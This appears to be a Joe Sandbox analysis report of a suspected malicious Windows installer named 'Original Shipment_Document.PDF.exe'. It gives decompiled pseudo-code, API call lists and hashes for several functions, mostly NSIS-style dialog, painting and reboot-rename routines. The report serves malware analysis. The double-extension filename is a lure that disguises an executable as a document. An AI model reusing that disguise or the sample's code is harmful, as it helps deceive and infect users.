                                                • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404FF5
                                                • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00405001
                                                • SendMessageW.USER32(?,00001132,00000000,?), ref: 0040509C
                                                • SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 004050CC
                                                  • Part of subcall function 00404498: SendMessageW.USER32(00000028,?,00000001,004042C3), ref: 004044A6
                                                • SendMessageW.USER32(?,00001132,00000000,?), ref: 004050E0
                                                • GetWindowLongW.USER32(?,000000F0), ref: 0040510E
                                                • SetWindowLongW.USER32 ref: 0040511C
                                                • ShowWindow.USER32(?,00000005), ref: 0040512C
                                                • SendMessageW.USER32(?,00000419,00000000,?), ref: 00405227
                                                • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 0040528C
                                                • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 004052A1
                                                • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 004052C5
                                                • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 004052E5
                                                • ImageList_Destroy.COMCTL32(?), ref: 004052FA
                                                • GlobalFree.KERNEL32 ref: 0040530A
                                                • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00405383
                                                • SendMessageW.USER32(?,00001102,?,?), ref: 0040542C
                                                • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 0040543B
                                                • InvalidateRect.USER32(?,00000000,00000001), ref: 00405466
                                                • ShowWindow.USER32(?,00000000), ref: 004054B4
                                                • GetDlgItem.USER32 ref: 004054BF
                                                • ShowWindow.USER32(00000000), ref: 004054C6
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.519250714.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.519237934.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519280685.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519295623.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519370433.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519382057.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519398577.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519410549.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519420801.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519429191.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Original Shipment_Document.jbxd
                                                Similarity
                                                • API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                • String ID: $M$N
                                                • API String ID: 2564846305-813528018
                                                • Opcode ID: 35b73b0ddb5c37642a621bb27d0b5ea63b41f9933646945a10f9cae77aa2ee02
                                                • Instruction ID: f25f8d73efcf6ba6a17deb726488d783a00b9a1a7703c2d4830b1b44d3514242
                                                • Opcode Fuzzy Hash: 35b73b0ddb5c37642a621bb27d0b5ea63b41f9933646945a10f9cae77aa2ee02
                                                • Instruction Fuzzy Hash: 34027D70A00609EFDB20DF95CC45AAF7BB5FB84315F10817AE910BA2E1D7798A52CF58
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00404622 Relevance: 37.0, APIs: 19, Strings: 2, Instructions: 204windowstringCOMMON
                                                Download Yara Rule
                                                C-Code - Quality: 91%
                                                			E00404622(struct HWND__* _a4, int _a8, unsigned int _a12, WCHAR* _a16) {
				intOrPtr _v8;
				int _v12;
				void* _v16;
				struct HWND__* _t56;
				intOrPtr _t69;
				signed int _t75;
				signed short* _t76;
				signed short* _t78;
				long _t92;
				int _t103;
				signed int _t110;
				intOrPtr _t113;
				WCHAR* _t114;
				signed int* _t116;
				WCHAR* _t117;
				struct HWND__* _t118;

				if(_a8 != 0x110) {
					if(_a8 != 0x111) {
						L13:
						if(_a8 != 0x4e) {
							if(_a8 == 0x40b) {
								 *0x4216d4 =  *0x4216d4 + 1;
							}
							L27:
							_t114 = _a16;
							L28:
							return E004044CA(_a8, _a12, _t114);
						}
						_t56 = GetDlgItem(_a4, 0x3e8);
						_t114 = _a16;
						if( *((intOrPtr*)(_t114 + 8)) == 0x70b &&  *((intOrPtr*)(_t114 + 0xc)) == 0x201) {
							_t103 =  *((intOrPtr*)(_t114 + 0x1c));
							_t113 =  *((intOrPtr*)(_t114 + 0x18));
							_v12 = _t103;
							_v16 = _t113;
							_v8 = 0x4281c0;
							if(_t103 - _t113 < 0x800) {
								SendMessageW(_t56, 0x44b, 0,  &_v16);
								SetCursor(LoadCursorW(0, 0x7f02));
								_push(1);
								E004048D1(_a4, _v8);
								SetCursor(LoadCursorW(0, 0x7f00));
								_t114 = _a16;
							}
						}
						if( *((intOrPtr*)(_t114 + 8)) != 0x700 ||  *((intOrPtr*)(_t114 + 0xc)) != 0x100) {
							goto L28;
						} else {
							if( *((intOrPtr*)(_t114 + 0x10)) == 0xd) {
								SendMessageW( *0x42a228, 0x111, 1, 0);
							}
							if( *((intOrPtr*)(_t114 + 0x10)) == 0x1b) {
								SendMessageW( *0x42a228, 0x10, 0, 0);
							}
							return 1;
						}
					}
					if(_a12 >> 0x10 != 0 ||  *0x4216d4 != 0) {
						goto L27;
					} else {
						_t69 =  *0x4226e0; // 0x54d124
						_t29 = _t69 + 0x14; // 0x54d138
						_t116 = _t29;
						if(( *_t116 & 0x00000020) == 0) {
							goto L27;
						}
						 *_t116 =  *_t116 & 0xfffffffe | SendMessageW(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001;
						E00404485(SendMessageW(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001);
						E004048AD();
						goto L13;
					}
				}
				_t117 = _a16;
				_t75 =  *(_t117 + 0x30);
				if(_t75 < 0) {
					_t75 =  *( *0x4291fc - 4 + _t75 * 4);
				}
				_t76 =  *0x42a258 + _t75 * 2;
				_t110 =  *_t76 & 0x0000ffff;
				_a8 = _t110;
				_t78 =  &(_t76[1]);
				_a16 = _t78;
				_v16 = _t78;
				_v12 = 0;
				_v8 = E004045D3;
				if(_t110 != 2) {
					_v8 = E00404599;
				}
				_push( *((intOrPtr*)(_t117 + 0x34)));
				_push(0x22);
				E00404463(_a4);
				_push( *((intOrPtr*)(_t117 + 0x38)));
				_push(0x23);
				E00404463(_a4);
				CheckDlgButton(_a4, (0 | ( !( *(_t117 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t117 + 0x14) & 0x00000001) == 0x00000000) + 0x40a, 1);
				E00404485( !( *(_t117 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t117 + 0x14) & 0x00000001);
				_t118 = GetDlgItem(_a4, 0x3e8);
				E00404498(_t118);
				SendMessageW(_t118, 0x45b, 1, 0);
				_t92 =  *( *0x42a230 + 0x68);
				if(_t92 < 0) {
					_t92 = GetSysColor( ~_t92);
				}
				SendMessageW(_t118, 0x443, 0, _t92);
				SendMessageW(_t118, 0x445, 0, 0x4010000);
				SendMessageW(_t118, 0x435, 0, lstrlenW(_a16));
				 *0x4216d4 = 0;
				SendMessageW(_t118, 0x449, _a8,  &_v16);
				 *0x4216d4 = 0;
				return 0;
			}



















                                                0x00404634
                                                0x00404761
                                                0x004047be
                                                0x004047c2
                                                0x0040488f
                                                0x00404891
                                                0x00404891
                                                0x00404897
                                                0x00404897
                                                0x0040489a
                                                0x00000000
                                                0x004048a1
                                                0x004047d0
                                                0x004047d6
                                                0x004047e0
                                                0x004047eb
                                                0x004047ee
                                                0x004047f1
                                                0x004047fc
                                                0x004047ff
                                                0x00404806
                                                0x00404813
                                                0x00404824
                                                0x0040482a
                                                0x00404832
                                                0x00404840
                                                0x00404846
                                                0x00404846
                                                0x00404806
                                                0x00404850
                                                0x00000000
                                                0x0040485b
                                                0x0040485f
                                                0x0040486f
                                                0x0040486f
                                                0x00404875
                                                0x00404881
                                                0x00404881
                                                0x00000000
                                                0x00404885
                                                0x00404850
                                                0x0040476c
                                                0x00000000
                                                0x0040477e
                                                0x0040477e
                                                0x00404783
                                                0x00404783
                                                0x00404789
                                                0x00000000
                                                0x00000000
                                                0x004047b2
                                                0x004047b4
                                                0x004047b9
                                                0x00000000
                                                0x004047b9
                                                0x0040476c
                                                0x0040463a
                                                0x0040463d
                                                0x00404642
                                                0x00404653
                                                0x00404653
                                                0x0040465b
                                                0x0040465e
                                                0x00404662
                                                0x00404665
                                                0x00404669
                                                0x0040466c
                                                0x0040466f
                                                0x00404672
                                                0x00404679
                                                0x0040467b
                                                0x0040467b
                                                0x00404685
                                                0x00404692
                                                0x0040469c
                                                0x004046a1
                                                0x004046a4
                                                0x004046a9
                                                0x004046c0
                                                0x004046c7
                                                0x004046da
                                                0x004046dd
                                                0x004046f1
                                                0x004046f8
                                                0x004046fd
                                                0x00404702
                                                0x00404702
                                                0x00404710
                                                0x0040471e
                                                0x00404730
                                                0x00404735
                                                0x00404745
                                                0x00404747
                                                0x00000000

                                                APIs
                                                • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 004046C0
                                                • GetDlgItem.USER32 ref: 004046D4
                                                • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 004046F1
                                                • GetSysColor.USER32(?), ref: 00404702
                                                • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 00404710
                                                • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 0040471E
                                                • lstrlenW.KERNEL32(?), ref: 00404723
                                                • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 00404730
                                                • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 00404745
                                                • GetDlgItem.USER32 ref: 0040479E
                                                • SendMessageW.USER32(00000000), ref: 004047A5
                                                • GetDlgItem.USER32 ref: 004047D0
                                                • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 00404813
                                                • LoadCursorW.USER32(00000000,00007F02), ref: 00404821
                                                • SetCursor.USER32(00000000), ref: 00404824
                                                • LoadCursorW.USER32(00000000,00007F00), ref: 0040483D
                                                • SetCursor.USER32(00000000), ref: 00404840
                                                • SendMessageW.USER32(00000111,00000001,00000000), ref: 0040486F
                                                • SendMessageW.USER32(00000010,00000000,00000000), ref: 00404881
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.519250714.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.519237934.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519280685.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519295623.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519370433.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519382057.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519398577.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519410549.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519420801.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519429191.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Original Shipment_Document.jbxd
                                                Similarity
                                                • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                                • String ID: Call$N
                                                • API String ID: 3103080414-3438112850
                                                • Opcode ID: 0388ebf4b552688962da2f0e60a0ed45a0ac6c6640f7b9ebe92ad344b143db63
                                                • Instruction ID: bd26b540472948519bfd0c296b0258925a36bd111cdc3ec084d9598cfd27fd02
                                                • Opcode Fuzzy Hash: 0388ebf4b552688962da2f0e60a0ed45a0ac6c6640f7b9ebe92ad344b143db63
                                                • Instruction Fuzzy Hash: A16180B1900209FFDB10AF61DD85AAA7B69FB84314F00853AFA05B62D1C7789D61CF99
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 125COMMON
                                                Download Yara Rule
                                                C-Code - Quality: 90%
                                                			E00401000(struct HWND__* _a4, void* _a8, signed int _a12, void* _a16) {
				struct tagLOGBRUSH _v16;
				struct tagRECT _v32;
				struct tagPAINTSTRUCT _v96;
				struct HDC__* _t70;
				struct HBRUSH__* _t87;
				struct HFONT__* _t94;
				long _t102;
				signed int _t126;
				struct HDC__* _t128;
				intOrPtr _t130;

				if(_a8 == 0xf) {
					_t130 =  *0x42a230;
					_t70 = BeginPaint(_a4,  &_v96);
					_v16.lbStyle = _v16.lbStyle & 0x00000000;
					_a8 = _t70;
					GetClientRect(_a4,  &_v32);
					_t126 = _v32.bottom;
					_v32.bottom = _v32.bottom & 0x00000000;
					while(_v32.top < _t126) {
						_a12 = _t126 - _v32.top;
						asm("cdq");
						asm("cdq");
						asm("cdq");
						_v16.lbColor = 0 << 0x00000008 | (( *(_t130 + 0x50) & 0x000000ff) * _a12 + ( *(_t130 + 0x54) & 0x000000ff) * _v32.top) / _t126 & 0x000000ff;
						_t87 = CreateBrushIndirect( &_v16);
						_v32.bottom = _v32.bottom + 4;
						_a16 = _t87;
						FillRect(_a8,  &_v32, _t87);
						DeleteObject(_a16);
						_v32.top = _v32.top + 4;
					}
					if( *(_t130 + 0x58) != 0xffffffff) {
						_t94 = CreateFontIndirectW( *(_t130 + 0x34));
						_a16 = _t94;
						if(_t94 != 0) {
							_t128 = _a8;
							_v32.left = 0x10;
							_v32.top = 8;
							SetBkMode(_t128, 1);
							SetTextColor(_t128,  *(_t130 + 0x58));
							_a8 = SelectObject(_t128, _a16);
							DrawTextW(_t128, 0x429220, 0xffffffff,  &_v32, 0x820);
							SelectObject(_t128, _a8);
							DeleteObject(_a16);
						}
					}
					EndPaint(_a4,  &_v96);
					return 0;
				}
				_t102 = _a16;
				if(_a8 == 0x46) {
					 *(_t102 + 0x18) =  *(_t102 + 0x18) | 0x00000010;
					 *((intOrPtr*)(_t102 + 4)) =  *0x42a228;
				}
				return DefWindowProcW(_a4, _a8, _a12, _t102);
			}













                                                0x0040100a
                                                0x00401039
                                                0x00401047
                                                0x0040104d
                                                0x00401051
                                                0x0040105b
                                                0x00401061
                                                0x00401064
                                                0x004010f3
                                                0x00401089
                                                0x0040108c
                                                0x004010a6
                                                0x004010bd
                                                0x004010cc
                                                0x004010cf
                                                0x004010d5
                                                0x004010d9
                                                0x004010e4
                                                0x004010ed
                                                0x004010ef
                                                0x004010ef
                                                0x00401100
                                                0x00401105
                                                0x0040110d
                                                0x00401110
                                                0x00401112
                                                0x00401118
                                                0x0040111f
                                                0x00401126
                                                0x00401130
                                                0x00401142
                                                0x00401156
                                                0x00401160
                                                0x00401165
                                                0x00401165
                                                0x00401110
                                                0x0040116e
                                                0x00000000
                                                0x00401178
                                                0x00401010
                                                0x00401013
                                                0x00401015
                                                0x0040101f
                                                0x0040101f
                                                0x00000000

                                                APIs
                                                • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                • BeginPaint.USER32(?,?), ref: 00401047
                                                • GetClientRect.USER32 ref: 0040105B
                                                • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                • FillRect.USER32 ref: 004010E4
                                                • DeleteObject.GDI32(?), ref: 004010ED
                                                • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                • SelectObject.GDI32(00000000,?), ref: 00401140
                                                • DrawTextW.USER32(00000000,00429220,000000FF,00000010,00000820), ref: 00401156
                                                • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                • DeleteObject.GDI32(?), ref: 00401165
                                                • EndPaint.USER32(?,?), ref: 0040116E
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.519250714.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.519237934.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519280685.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519295623.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519370433.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519382057.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519398577.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519410549.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519420801.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519429191.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Original Shipment_Document.jbxd
                                                Similarity
                                                • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                • String ID: F
                                                • API String ID: 941294808-1304234792
                                                • Opcode ID: 0581a76dac59d14a304b59f1a22efed427390318551c262ebfc8c4fa99717288
                                                • Instruction ID: ce1ac2179a7edcd12a9bbec6f3b07c603adbad34dac6b1105353c89659c02e28
                                                • Opcode Fuzzy Hash: 0581a76dac59d14a304b59f1a22efed427390318551c262ebfc8c4fa99717288
                                                • Instruction Fuzzy Hash: 63417B71800209EFCF058FA5DE459AF7BB9FF45315F00802AF991AA2A0CB74DA55DFA4
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0040614D Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 130memorystringCOMMON
                                                Download Yara Rule
                                                C-Code - Quality: 100%
                                                			E0040614D(void* __ecx) {
				void* __ebx;
				void* __edi;
				void* __esi;
				long _t12;
				long _t24;
				char* _t31;
				int _t37;
				void* _t38;
				intOrPtr* _t39;
				long _t42;
				WCHAR* _t44;
				void* _t46;
				void* _t48;
				void* _t49;
				void* _t52;
				void* _t53;

				_t38 = __ecx;
				_t44 =  *(_t52 + 0x14);
				 *0x426da8 = 0x55004e;
				 *0x426dac = 0x4c;
				if(_t44 == 0) {
					L3:
					_t12 = GetShortPathNameW( *(_t52 + 0x1c), 0x4275a8, 0x400);
					if(_t12 != 0 && _t12 <= 0x400) {
						_t37 = wsprintfA(0x4269a8, "%ls=%ls\r\n", 0x426da8, 0x4275a8);
						_t53 = _t52 + 0x10;
						E00406544(_t37, 0x400, 0x4275a8, 0x4275a8,  *((intOrPtr*)( *0x42a230 + 0x128)));
						_t12 = E00405FF7(0x4275a8, 0xc0000000, 4);
						_t48 = _t12;
						 *(_t53 + 0x18) = _t48;
						if(_t48 != 0xffffffff) {
							_t42 = GetFileSize(_t48, 0);
							_t6 = _t37 + 0xa; // 0xa
							_t46 = GlobalAlloc(0x40, _t42 + _t6);
							if(_t46 == 0 || E0040607A(_t48, _t46, _t42) == 0) {
								L18:
								return CloseHandle(_t48);
							} else {
								if(E00405F5C(_t38, _t46, "[Rename]\r\n") != 0) {
									_t49 = E00405F5C(_t38, _t21 + 0xa, "\n[");
									if(_t49 == 0) {
										_t48 =  *(_t53 + 0x18);
										L16:
										_t24 = _t42;
										L17:
										E00405FB2(_t24 + _t46, 0x4269a8, _t37);
										SetFilePointer(_t48, 0, 0, 0);
										E004060A9(_t48, _t46, _t42 + _t37);
										GlobalFree(_t46);
										goto L18;
									}
									_t39 = _t46 + _t42;
									_t31 = _t39 + _t37;
									while(_t39 > _t49) {
										 *_t31 =  *_t39;
										_t31 = _t31 - 1;
										_t39 = _t39 - 1;
									}
									_t24 = _t49 - _t46 + 1;
									_t48 =  *(_t53 + 0x18);
									goto L17;
								}
								lstrcpyA(_t46 + _t42, "[Rename]\r\n");
								_t42 = _t42 + 0xa;
								goto L16;
							}
						}
					}
				} else {
					CloseHandle(E00405FF7(_t44, 0, 1));
					_t12 = GetShortPathNameW(_t44, 0x426da8, 0x400);
					if(_t12 != 0 && _t12 <= 0x400) {
						goto L3;
					}
				}
				return _t12;
			}



















                                                0x0040614d
                                                0x00406156
                                                0x0040615d
                                                0x00406167
                                                0x0040617b
                                                0x004061a3
                                                0x004061ae
                                                0x004061b2
                                                0x004061d2
                                                0x004061d9
                                                0x004061e3
                                                0x004061f0
                                                0x004061f5
                                                0x004061fa
                                                0x004061fe
                                                0x0040620d
                                                0x0040620f
                                                0x0040621c
                                                0x00406220
                                                0x004062bb
                                                0x00000000
                                                0x00406236
                                                0x00406243
                                                0x00406267
                                                0x0040626b
                                                0x0040628a
                                                0x0040628e
                                                0x0040628e
                                                0x00406290
                                                0x00406299
                                                0x004062a4
                                                0x004062af
                                                0x004062b5
                                                0x00000000
                                                0x004062b5
                                                0x0040626d
                                                0x00406270
                                                0x0040627b
                                                0x00406277
                                                0x00406279
                                                0x0040627a
                                                0x0040627a
                                                0x00406282
                                                0x00406284
                                                0x00000000
                                                0x00406284
                                                0x0040624e
                                                0x00406254
                                                0x00000000
                                                0x00406254
                                                0x00406220
                                                0x004061fe
                                                0x0040617d
                                                0x00406188
                                                0x00406191
                                                0x00406195
                                                0x00000000
                                                0x00000000
                                                0x00406195
                                                0x004062c6

                                                APIs
                                                • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,?,004062E8,?,?), ref: 00406188
                                                • GetShortPathNameW.KERNEL32 ref: 00406191
                                                  • Part of subcall function 00405F5C: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00406241,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405F6C
                                                  • Part of subcall function 00405F5C: lstrlenA.KERNEL32(00000000,?,00000000,00406241,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405F9E
                                                • GetShortPathNameW.KERNEL32 ref: 004061AE
                                                • wsprintfA.USER32 ref: 004061CC
                                                • GetFileSize.KERNEL32(00000000,00000000,004275A8,C0000000,00000004,004275A8,?,?,?,?,?), ref: 00406207
                                                • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00406216
                                                • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 0040624E
                                                • SetFilePointer.KERNEL32(0040A580,00000000,00000000,00000000,00000000,004269A8,00000000,-0000000A,0040A580,00000000,[Rename],00000000,00000000,00000000), ref: 004062A4
                                                • GlobalFree.KERNEL32 ref: 004062B5
                                                • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 004062BC
                                                  • Part of subcall function 00405FF7: GetFileAttributesW.KERNELBASE(00000003,004030BD,C:\Users\user\Desktop\Original Shipment_Document.PDF.exe,80000000,00000003,?,?,?,?,?,00403847,?), ref: 00405FFB
                                                  • Part of subcall function 00405FF7: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,?,?,00403847,?), ref: 0040601D
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.519250714.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.519237934.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519280685.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519295623.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519370433.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519382057.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519398577.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519410549.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519420801.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519429191.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Original Shipment_Document.jbxd
                                                Similarity
                                                • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                                • String ID: %ls=%ls$[Rename]
                                                • API String ID: 2171350718-461813615
                                                • Opcode ID: 48f58ee6c1568dd199c04865158994eb8a9ff379ffc5c95430a82ce8fda2b485
                                                • Instruction ID: ee14a5085299e91e75cde0480e6b7733258fb9cdf367bc6c01a907801337673b
                                                • Opcode Fuzzy Hash: 48f58ee6c1568dd199c04865158994eb8a9ff379ffc5c95430a82ce8fda2b485
                                                • Instruction Fuzzy Hash: 03312130201715BFD2207B619D48F2B3AACEF41718F16007EBD42F62C2DE3C982586AD
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 6EAC2655 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 109COMMON
                                                Download Yara Rule
                                                C-Code - Quality: 88%
                                                			E6EAC2655() {
				intOrPtr _t24;
				void* _t26;
				intOrPtr _t27;
				signed int _t39;
				void* _t40;
				void* _t43;
				intOrPtr _t44;
				void* _t45;

				_t40 = E6EAC12BB();
				_t24 =  *((intOrPtr*)(_t45 + 0x18));
				_t44 =  *((intOrPtr*)(_t24 + 0x1014));
				_t43 = (_t44 + 0x81 << 5) + _t24;
				do {
					if( *((intOrPtr*)(_t43 - 4)) >= 0) {
					}
					_t39 =  *(_t43 - 8) & 0x000000ff;
					if(_t39 <= 7) {
						switch( *((intOrPtr*)(_t39 * 4 +  &M6EAC2784))) {
							case 0:
								 *_t40 = 0;
								goto L17;
							case 1:
								__eax =  *__eax;
								if(__ecx > __ebx) {
									 *(__esp + 0x10) = __ecx;
									__ecx =  *(0x6eac407c + __edx * 4);
									__edx =  *(__esp + 0x10);
									__ecx = __ecx * __edx;
									asm("sbb edx, edx");
									__edx = __edx & __ecx;
									__eax = __eax &  *(0x6eac409c + __edx * 4);
								}
								_push(__eax);
								goto L15;
							case 2:
								__eax = E6EAC1510(__edx,  *__eax,  *((intOrPtr*)(__eax + 4)), __edi);
								goto L16;
							case 3:
								__ecx =  *0x6eac506c;
								__edx = __ecx - 1;
								__eax = MultiByteToWideChar(__ebx, __ebx,  *__eax, __ecx, __edi, __edx);
								__eax =  *0x6eac506c;
								 *((short*)(__edi + __eax * 2 - 2)) = __bx;
								goto L17;
							case 4:
								__eax = lstrcpynW(__edi,  *__eax,  *0x6eac506c);
								goto L17;
							case 5:
								_push( *0x6eac506c);
								_push(__edi);
								_push( *__eax);
								" {\'t@u\'t"();
								goto L17;
							case 6:
								_push( *__esi);
								L15:
								__eax = wsprintfW(__edi, 0x6eac5000);
								L16:
								__esp = __esp + 0xc;
								goto L17;
						}
					}
					L17:
					_t26 =  *(_t43 + 0x14);
					if(_t26 != 0 && ( *((intOrPtr*)( *((intOrPtr*)(_t45 + 0x18)))) != 2 ||  *((intOrPtr*)(_t43 - 4)) > 0)) {
						GlobalFree(_t26);
					}
					_t27 =  *((intOrPtr*)(_t43 + 0xc));
					if(_t27 != 0) {
						if(_t27 != 0xffffffff) {
							if(_t27 > 0) {
								E6EAC1381(_t27 - 1, _t40);
								goto L26;
							}
						} else {
							E6EAC1312(_t40);
							L26:
						}
					}
					_t44 = _t44 - 1;
					_t43 = _t43 - 0x20;
				} while (_t44 >= 0);
				return GlobalFree(_t40);
			}











                                                0x6eac265f
                                                0x6eac2661
                                                0x6eac2665
                                                0x6eac2674
                                                0x6eac2678
                                                0x6eac267d
                                                0x6eac267d
                                                0x6eac2685
                                                0x6eac268c
                                                0x6eac2692
                                                0x00000000
                                                0x6eac2699
                                                0x00000000
                                                0x00000000
                                                0x6eac26a1
                                                0x6eac26a5
                                                0x6eac26a8
                                                0x6eac26ac
                                                0x6eac26b3
                                                0x6eac26b7
                                                0x6eac26bd
                                                0x6eac26bf
                                                0x6eac26c1
                                                0x6eac26c1
                                                0x6eac26c8
                                                0x00000000
                                                0x00000000
                                                0x6eac26d1
                                                0x00000000
                                                0x00000000
                                                0x6eac26d8
                                                0x6eac26de
                                                0x6eac26e8
                                                0x6eac26ee
                                                0x6eac26f3
                                                0x00000000
                                                0x00000000
                                                0x6eac2714
                                                0x00000000
                                                0x00000000
                                                0x6eac26fa
                                                0x6eac2700
                                                0x6eac2701
                                                0x6eac2703
                                                0x00000000
                                                0x00000000
                                                0x6eac271c
                                                0x6eac271e
                                                0x6eac2724
                                                0x6eac272a
                                                0x6eac272a
                                                0x00000000
                                                0x00000000
                                                0x6eac2692
                                                0x6eac272d
                                                0x6eac272d
                                                0x6eac2732
                                                0x6eac2743
                                                0x6eac2743
                                                0x6eac2749
                                                0x6eac274e
                                                0x6eac2753
                                                0x6eac275f
                                                0x6eac2764
                                                0x00000000
                                                0x6eac2769
                                                0x6eac2755
                                                0x6eac2756
                                                0x6eac276a
                                                0x6eac276a
                                                0x6eac2753
                                                0x6eac276b
                                                0x6eac276c
                                                0x6eac276f
                                                0x6eac2783

                                                APIs
